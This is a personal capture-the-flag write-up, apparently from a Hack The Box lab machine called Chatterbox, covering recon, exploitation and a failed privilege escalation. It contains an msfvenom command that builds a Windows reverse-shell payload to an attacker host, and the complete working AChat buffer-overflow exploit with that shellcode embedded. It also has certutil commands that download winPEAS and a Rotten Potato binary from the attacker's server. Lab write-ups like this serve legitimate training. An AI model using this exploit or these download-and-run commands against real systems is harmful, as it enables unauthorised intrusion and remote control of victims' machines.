10.10.10.74¶
Recon¶
Port Scan¶
PORT STATE SERVICE REASON VERSION
9255/tcp open http syn-ack ttl 127 AChat chat system httpd |_http-title: Site doesn't have a title. | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-favicon: Unknown favicon MD5: 0B6115FAE5429FEB9A494BEE6B18ABBE
9256/tcp open achat syn-ack ttl 127 AChat chat system
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista|Phone|8.1|2012 (91%) OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2012:r2 OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows 7 Professional or Windows 8 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (90%), Microsoft Windows Vista SP2 (90%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (89%), Microsoft Windows 8.1 Update 1 (89%)
Only 2 open ports. I guess the name Chatterbox is supposed to be a joke.
Nothing really useful in the scan results. UDP ports are still being scanned, hopefully something comes up. Nothing came up. What on earth am I supposed to do with this box!?!?
I feel like I'll need to rescan this one....or something.
I reverted and re-scanned. Turns out the name Chatterbox is because this box is hosting AChat.
Public exploits¶
Using EDB-36025. Had to change line 57 to include the right IP address.
Also need to swap out the payload - this POC just pops calc.exe
Get new payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.4 LPORT=444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
After changing out the payload, here's the completed exploit
#!/usr/bin/python # Author KAhara MAnhara # Achat 0.150 beta7 - Buffer Overflow # Tested on Windows 7 32bit import socket import sys, time buf = b"" buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" buf += b"\x47\x42\x39\x75\x34\x4a\x42\x4b\x4c\x77\x78\x44\x42" buf += b"\x79\x70\x79\x70\x59\x70\x63\x30\x74\x49\x48\x65\x50" buf += b"\x31\x39\x30\x50\x64\x34\x4b\x6e\x70\x6c\x70\x32\x6b" buf += b"\x42\x32\x4c\x4c\x42\x6b\x70\x52\x4d\x44\x52\x6b\x53" buf += b"\x42\x6c\x68\x4a\x6f\x48\x37\x4e\x6a\x6b\x76\x4d\x61" buf += b"\x4b\x4f\x34\x6c\x6d\x6c\x73\x31\x61\x6c\x6a\x62\x6e" buf += b"\x4c\x6b\x70\x57\x51\x36\x6f\x6c\x4d\x79\x71\x67\x57" buf += b"\x38\x62\x4b\x42\x72\x32\x61\x47\x74\x4b\x61\x42\x6a" buf += b"\x70\x74\x4b\x50\x4a\x4d\x6c\x52\x6b\x6e\x6c\x6e\x31" buf += b"\x70\x78\x4b\x33\x4d\x78\x49\x71\x78\x51\x6f\x61\x62" buf += b"\x6b\x52\x39\x6b\x70\x6b\x51\x37\x63\x32\x6b\x6f\x59" buf += b"\x4b\x68\x69\x53\x4d\x6a\x6e\x69\x72\x6b\x30\x34\x52" buf += b"\x6b\x6a\x61\x69\x46\x4c\x71\x59\x6f\x74\x6c\x67\x51" buf += b"\x38\x4f\x4c\x4d\x7a\x61\x77\x57\x4d\x68\x57\x70\x34" buf += b"\x35\x79\x66\x59\x73\x31\x6d\x78\x78\x4f\x4b\x31\x6d" buf += b"\x6f\x34\x52\x55\x79\x54\x42\x38\x32\x6b\x30\x58\x6c" buf += b"\x64\x6a\x61\x67\x63\x42\x46\x54\x4b\x4a\x6c\x4e\x6b" buf += b"\x64\x4b\x72\x38\x6d\x4c\x7a\x61\x46\x73\x64\x4b\x59" buf += b"\x74\x72\x6b\x6d\x31\x38\x50\x55\x39\x51\x34\x6c\x64" buf += b"\x4d\x54\x6f\x6b\x6f\x6b\x51\x51\x52\x39\x6e\x7a\x72" buf += b"\x31\x79\x6f\x47\x70\x61\x4f\x31\x4f\x61\x4a\x74\x4b" buf += b"\x7a\x72\x7a\x4b\x44\x4d\x51\x4d\x53\x38\x6d\x63\x50" buf += b"\x32\x59\x70\x59\x70\x52\x48\x63\x47\x31\x63\x30\x32" buf += b"\x61\x4f\x52\x34\x30\x68\x6e\x6c\x71\x67\x6c\x66\x4d" buf += b"\x37\x39\x6f\x36\x75\x55\x68\x74\x50\x59\x71\x59\x70" buf += b"\x39\x70\x6e\x49\x49\x34\x62\x34\x4e\x70\x62\x48\x4d" buf += b"\x59\x31\x70\x32\x4b\x6b\x50\x79\x6f\x56\x75\x32\x30" buf += b"\x30\x50\x52\x30\x32\x30\x4f\x50\x52\x30\x4f\x50\x50" buf += b"\x50\x31\x58\x69\x5a\x6c\x4f\x39\x4f\x4b\x30\x6b\x4f" buf += b"\x6a\x35\x33\x67\x50\x6a\x6b\x55\x71\x58\x6a\x6a\x79" buf += b"\x7a\x6e\x30\x4d\x34\x32\x48\x4c\x42\x4d\x30\x4d\x31" buf += b"\x45\x6c\x34\x49\x58\x66\x62\x4a\x4a\x70\x6e\x76\x6f" buf += b"\x67\x43\x38\x63\x69\x73\x75\x44\x34\x70\x61\x49\x6f" buf += b"\x56\x75\x51\x75\x35\x70\x70\x74\x7a\x6c\x79\x6f\x4e" buf += b"\x6e\x69\x78\x70\x75\x7a\x4c\x30\x68\x7a\x50\x48\x35" buf += b"\x75\x52\x6e\x76\x6b\x4f\x77\x65\x52\x48\x71\x53\x50" buf += b"\x6d\x30\x64\x59\x70\x51\x79\x59\x53\x42\x37\x4e\x77" buf += b"\x62\x37\x70\x31\x4a\x56\x32\x4a\x4d\x42\x32\x39\x31" buf += b"\x46\x38\x62\x39\x6d\x71\x56\x75\x77\x51\x34\x4d\x54" buf += b"\x6d\x6c\x39\x71\x59\x71\x54\x4d\x71\x34\x6c\x64\x4c" buf += b"\x50\x59\x36\x49\x70\x51\x34\x62\x34\x72\x30\x70\x56" buf += b"\x6f\x66\x32\x36\x31\x36\x42\x36\x50\x4e\x50\x56\x4f" buf += b"\x66\x42\x33\x72\x36\x52\x48\x50\x79\x46\x6c\x4d\x6f" buf += b"\x52\x66\x79\x6f\x49\x45\x73\x59\x67\x70\x4e\x6e\x62" buf += b"\x36\x4f\x56\x79\x6f\x4c\x70\x62\x48\x4b\x58\x62\x67" buf += b"\x4d\x4d\x63\x30\x69\x6f\x37\x65\x75\x6b\x68\x70\x56" buf += b"\x55\x33\x72\x62\x36\x51\x58\x63\x76\x33\x65\x37\x4d" buf += b"\x45\x4d\x59\x6f\x58\x55\x4d\x6c\x4a\x66\x43\x4c\x5a" buf += b"\x6a\x73\x50\x6b\x4b\x37\x70\x33\x45\x59\x75\x35\x6b" buf += b"\x71\x37\x4e\x33\x30\x72\x62\x4f\x6f\x7a\x6b\x50\x6e" buf += b"\x73\x39\x6f\x36\x75\x41\x41" # Create a UDP socket sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) server_address = ('10.10.10.74', 9256) fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00" p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46) p += "\x62" + "A"*45 p += "\x61\x40" p += "\x2A\x46" p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43" p += "\x61\x43" + "\x2A\x46" p += "\x2A" + fs + "C" * (157-len(fs)- 31-3) p += buf + "A" * (1152 - len(buf)) p += "\x00" + "A"*10 + "\x00" print "---->{P00F}!" i=0 while i<len(p): if i > 172000: time.sleep(1.0) sent = sock.sendto(p[i:(i+8192)], server_address) i += sent sock.close()
Started a listener, then fired the exploit.
My first point :) eeek.
User Flag¶
SystemInfo
systeminfo
Host Name: CHATTERBOX
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00371-222-9819843-86663
Original Install Date: 12/10/2017, 9:18:19 AM
System Boot Time: 2/3/2022, 10:37:18 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 2 Processor(s) Installed.
[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,536 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,425 MB
Virtual Memory: In Use: 670 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CHATTERBOX
Hotfix(s): 183 Hotfix(s) Installed.
Hotfix(s): 183 Hotfix(s) Installed.
[01]: KB2849697
[02]: KB2849696
[03]: KB2841134
[04]: KB2670838
[05]: KB2830477
[06]: KB2592687
[07]: KB2479943
[08]: KB2491683
[09]: KB2506212
[10]: KB2506928
[11]: KB2509553
[12]: KB2533552
[13]: KB2534111
[14]: KB2545698
[15]: KB2547666
[16]: KB2552343
[17]: KB2560656
[18]: KB2563227
[19]: KB2564958
[20]: KB2574819
[21]: KB2579686
[22]: KB2604115
[23]: KB2620704
[24]: KB2621440
[25]: KB2631813
[26]: KB2639308
[27]: KB2640148
[28]: KB2647753
[29]: KB2654428
[30]: KB2660075
[31]: KB2667402
[32]: KB2676562
[33]: KB2685811
[34]: KB2685813
[35]: KB2690533
[36]: KB2698365
[37]: KB2705219
[38]: KB2719857
[39]: KB2726535
[40]: KB2727528
[41]: KB2729094
[42]: KB2732059
[43]: KB2732487
[44]: KB2736422
[45]: KB2742599
[46]: KB2750841
[47]: KB2761217
[48]: KB2763523
[49]: KB2770660
[50]: KB2773072
[51]: KB2786081
[52]: KB2799926
[53]: KB2800095
[54]: KB2807986
[55]: KB2808679
[56]: KB2813430
[57]: KB2820331
[58]: KB2834140
[59]: KB2840631
[60]: KB2843630
[61]: KB2847927
[62]: KB2852386
[63]: KB2853952
[64]: KB2857650
[65]: KB2861698
[66]: KB2862152
[67]: KB2862330
[68]: KB2862335
[69]: KB2864202
[70]: KB2868038
[71]: KB2871997
[72]: KB2884256
[73]: KB2891804
[74]: KB2892074
[75]: KB2893294
[76]: KB2893519
[77]: KB2894844
[78]: KB2900986
[79]: KB2908783
[80]: KB2911501
[81]: KB2912390
[82]: KB2918077
[83]: KB2919469
[84]: KB2923545
[85]: KB2931356
[86]: KB2937610
[87]: KB2943357
[88]: KB2952664
[89]: KB2966583
[90]: KB2968294
[91]: KB2970228
[92]: KB2972100
[93]: KB2973112
[94]: KB2973201
[95]: KB2973351
[96]: KB2977292
[97]: KB2978742
[98]: KB2984972
[99]: KB2985461
[100]: KB2991963
[101]: KB2992611
[102]: KB3003743
[103]: KB3004361
[104]: KB3004375
[105]: KB3006121
[106]: KB3006137
[107]: KB3010788
[108]: KB3011780
[109]: KB3013531
[110]: KB3020370
[111]: KB3020388
[112]: KB3021674
[113]: KB3021917
[114]: KB3022777
[115]: KB3023215
[116]: KB3030377
[117]: KB3035126
[118]: KB3037574
[119]: KB3042058
[120]: KB3045685
[121]: KB3046017
[122]: KB3046269
[123]: KB3054476
[124]: KB3055642
[125]: KB3059317
[126]: KB3060716
[127]: KB3061518
[128]: KB3067903
[129]: KB3068708
[130]: KB3071756
[131]: KB3072305
[132]: KB3074543
[133]: KB3075226
[134]: KB3078601
[135]: KB3078667
[136]: KB3080149
[137]: KB3084135
[138]: KB3086255
[139]: KB3092627
[140]: KB3093513
[141]: KB3097989
[142]: KB3101722
[143]: KB3102429
[144]: KB3107998
[145]: KB3108371
[146]: KB3108381
[147]: KB3108664
[148]: KB3109103
[149]: KB3109560
[150]: KB3110329
[151]: KB3118401
[152]: KB3122648
[153]: KB3123479
[154]: KB3126587
[155]: KB3127220
[156]: KB3133977
[157]: KB3137061
[158]: KB3138378
[159]: KB3138612
[160]: KB3138910
[161]: KB3139398
[162]: KB3139914
[163]: KB3140245
[164]: KB3147071
[165]: KB3150220
[166]: KB3150513
[167]: KB3156016
[168]: KB3156019
[169]: KB3159398
[170]: KB3161102
[171]: KB3161949
[172]: KB3161958
[173]: KB3172605
[174]: KB3177467
[175]: KB3179573
[176]: KB3184143
[177]: KB3185319
[178]: KB4014596
[179]: KB4019990
[180]: KB4040980
[181]: KB976902
[182]: KB982018
[183]: KB4054518
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.74
copy WinPEAS to target.
certutil.exe -urlcache -f http://10.10.16.4:80/winPEASx86.exe wp.exe
WinPEAS findings:¶
Nothing else really cool in WinPEAS - guess I should try exploit suggester. Here are the local, non-metasploit, exploits.
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
PrivEsc¶
MS16-075 - Rotten Potato¶
certutil.exe -urlcache -f http://10.10.16.4:80/potato.exe potato.exe
Sleeping for 5 mins....I guess I'll wait for my SYSTEM shell...
Shell never came back :( coming back to this later.